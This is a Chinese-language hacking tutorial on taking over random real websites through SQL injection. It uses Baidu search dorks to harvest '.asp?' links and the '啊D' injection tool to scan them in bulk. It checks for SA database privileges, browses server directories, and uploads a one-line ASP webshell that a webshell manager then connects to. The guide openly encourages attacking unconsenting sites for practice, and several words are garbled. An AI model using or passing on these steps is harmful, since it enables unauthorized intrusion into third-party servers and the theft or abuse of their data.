許多朋友老是問怎么才能入侵一個網(wǎng)站,也有的朋友問有沒有上傳木馬的空間,或者問怎么拿到一只肉雞玩。其實抓肉雞是一個很簡單的事情,這里我們就再現(xiàn)經(jīng)典的SQL注入漏洞,包每一個讀者都能拿到網(wǎng)站肉雞。
搜漏的技巧——尋找有漏洞的主機
首先準備的是一個SQL注入工具“啊D注入工具v2.3”。這可是一個經(jīng)典的SQL注入工具了。不知道什么是SQL注入的朋友,可以上網(wǎng)查一下資料。既然拿出“啊D注入工具v2.3”,那么肯定是要進行SQL注入攻擊了。但問題是如何尋找有SQL注入漏洞的主機呢?一個非常簡單的技巧那就是百度與3D結(jié)合,迅速尋找到上萬臺有SQL注入漏洞的網(wǎng)站主機。
百度找鏈接
打開百度搜索。在頁面中點擊“高級”鏈接,打開百度的高級搜索頁面。在“包含以下全部的關(guān)鍵詞”中輸入“.asp?”。將“搜索結(jié)果顯示條數(shù)”設(shè)置為“每頁顯示100條”,“語言”設(shè)置為“全部語言”。將“關(guān)鍵詞位置”設(shè)置為“僅在網(wǎng)頁的URL中”。最后點擊“百度一下”按鈕,即可打開搜索結(jié)果面面了??梢钥吹巾撁嬷酗@示的搜索結(jié)果,都是形如“http://www.***.com/*.asp?*=*”之類的字符或數(shù)字型鏈接地址。對SQL注入略有所知的用戶,肯定都會忍不住打開一個鏈接。然后開始測試鏈接是否存在SQL注入漏洞了吧?
一個秘不外傳的技巧
一般的黑客書籍上面,都是教菜鳥們一個一個地檢測鏈接地址。不管是手工檢測也好。還是用工具檢測也好,都是非常麻煩的。也許試到頭昏眼花,也不一定找得到SQL注入漏洞鏈接地址。其實有更高效的方法可以讓尋找SQL注入漏洞自動化許多。
直接在瀏覽器地址欄中。復制搜索結(jié)果網(wǎng)頁的鏈接地址,這里為“http://www.baidu.com/s?tn=baiduadvq1=.asp%3Fq2=q3=q4=rn=100lm=Oct=Oft=&q5=2q6=”。復制后,運行“啊D注入工具v2.3”。點擊左側(cè)邊欄中的“注入檢測”-“掃描注入點”,在右邊窗口的地址欄中。粘貼剛才復制的搜索鏈接。然后點擊地址欄后的“打開網(wǎng)頁”按鈕,在窗口中就會顯示剛才的搜索結(jié)果頁面了。
此時。表面看起來與在瀏覽器中進行搜索沒有什么兩樣。但實際上3D注入工具已經(jīng)開始自動分析搜索結(jié)果中的每一個鏈接地址,并檢測是否存在SQL注入漏洞了。在下方的檢測框中會顯示“正在檢測××個鏈接”。多等一會兒,讓所有鏈接檢測完畢。然后就可以看到檢測框中列表顯示存在SQL注入漏洞的鏈接地址了。如果在當前頁中沒有檢測到多少漏洞鏈接,那么可在上方的窗口頁面中,點擊搜索結(jié)果下一頁鏈接,繼續(xù)檢測漏洞鏈接。最多一分鐘,你就可以看到列表中顯示數(shù)十個漏洞鏈接地址了。
由于SQL注入攻擊曾經(jīng)很泛濫。因此許多網(wǎng)站都打上了SQL注入漏洞的補丁?,F(xiàn)在要找存在SQL注入漏洞的站點是非常難了。不過巧妙的將百度搜索功能與3D注入工具的頁面鏈接分析檢測功能相結(jié)合。就可以很輕松的找到成千上萬個SQL注入漏洞鏈接地址了。上面的搜索結(jié)果就有4800多萬條,這其中就算只有1%的漏洞概率,也有數(shù)十萬個漏洞鏈接地址!菜鳥們再也不用擔心出現(xiàn)漏洞過時。找不到漏洞站點攻擊練手的現(xiàn)象了。
小提示
上面我們使用的是關(guān)鍵詞“asp?”進行搜索,還可以使用其它的關(guān)鍵詞進行搜索,例如“www.asp?”、“edu.asp?”、“電影.asp?”、“.aspx?”、“.js?等,可以擴大搜索結(jié)果。如果用Goog Je之類的國外搜索引擎進行搜索,則可以找到更多的漏洞站點!
輕松拿下漏洞站點
找到了存在SQL注入漏洞的站點后,如何進行攻擊呢?SQL注入攻擊的方式多種多樣。比如猜解管理員密碼和后臺登錄頁面。直接利用xp_cmdshelt開3389或上傳木馬等。這里我們選擇的當然是最簡單的方法。什么權(quán)限、后臺密碼破解之類的都不用——利用SA上傳木馬!
檢測SA權(quán)限
在檢測到的漏洞鏈接地址列表中,右鍵點擊某個漏洞鏈接,在彈出菜單中選擇“注入檢測”命令,切換到“SQL注入檢測”界面。點擊右邊界面中的“檢測”按鈕。將自動檢測該鏈接是否存在SQL注入漏洞,如果存在的話,則顯示當前數(shù)據(jù)庫類型、用戶和權(quán)限等信息。詳細看看下方顯示的結(jié)果,如果看到“SA”和“多句執(zhí)行”,那么恭喜小菜們。你基本上可以肯定的拿下這個網(wǎng)站,獲得一個肉雞了!
小提示
如果檢測的鏈接不具有SA權(quán)限,那么可以換一個鏈接地址,反正掃描到的漏洞鏈接是一大把,總有許多是具備SA權(quán)限的。查看界面的“檢測位置”中。輸入要查看文件的巨錄路徑。點擊“開始檢測”按鈕,即可顯示該IE錄下的文件及子文件夾了。一般來說。網(wǎng)站的路徑都是位于非系統(tǒng)盤的,大部分是位于“D:\\WEB”中,可以直接查看該路徑中的文件信息。如果該文件夾不存在。則只有從C盤D盤等根目錄慢慢查找網(wǎng)站的路徑了。
上傳木馬
用記事本編寫一個后綴名.asp的文件,內(nèi)容如下:
<%eval request(“pass”)%>
注意。在寫入文件時。上面代碼中的“pass”就是后面要用到的連接密碼,需要改為自己想要的密碼。將文件保存為“muma.asp”,然后在3D注入工具中。點擊左側(cè)“相關(guān)工具”-“CMD/上傳”項,在命令執(zhí)行與上傳界面下方的“上傳文件”中,點擊下方的“本地文件”瀏覽按鈕。瀏覽指定剛才保存的“muma,asp”文件。在“目標路徑”中設(shè)定文件保存路徑,注意要指定保存在網(wǎng)站路徑之下,這里為“D:\\WEB\\muma.asp”。最后點擊“上傳”按鈕,就可以成功的將木馬上傳到網(wǎng)站根目錄下了。上傳完成后,再用“目錄查看”功能。查看一下文件是否上傳成功。
連接木馬
運行桂林老兵的木馬后門管理工具“WebshellControl v2.0”。點擊菜單“工具”-“shell管理”命令。打開Shell管理窗口。在下方的“地址”中輸入剛才上傳的ASP木馬鏈接地址及連接密碼。點擊“連接”按鈕,即可連接打開Webshell。在Webshell管理窗口中,可以查看任意目錄中的文件,并可以上傳、下載或編輯任意文件。
現(xiàn)在這臺網(wǎng)站服務(wù)器基本處于我們的控制之下了,要上傳木馬,或者將網(wǎng)站作為自己的免費空間都是很容易的了。至于進一步提升權(quán)限。安裝遠程控制木馬則需要一定的入侵知識,留待小菜們以后慢慢提高學習吧!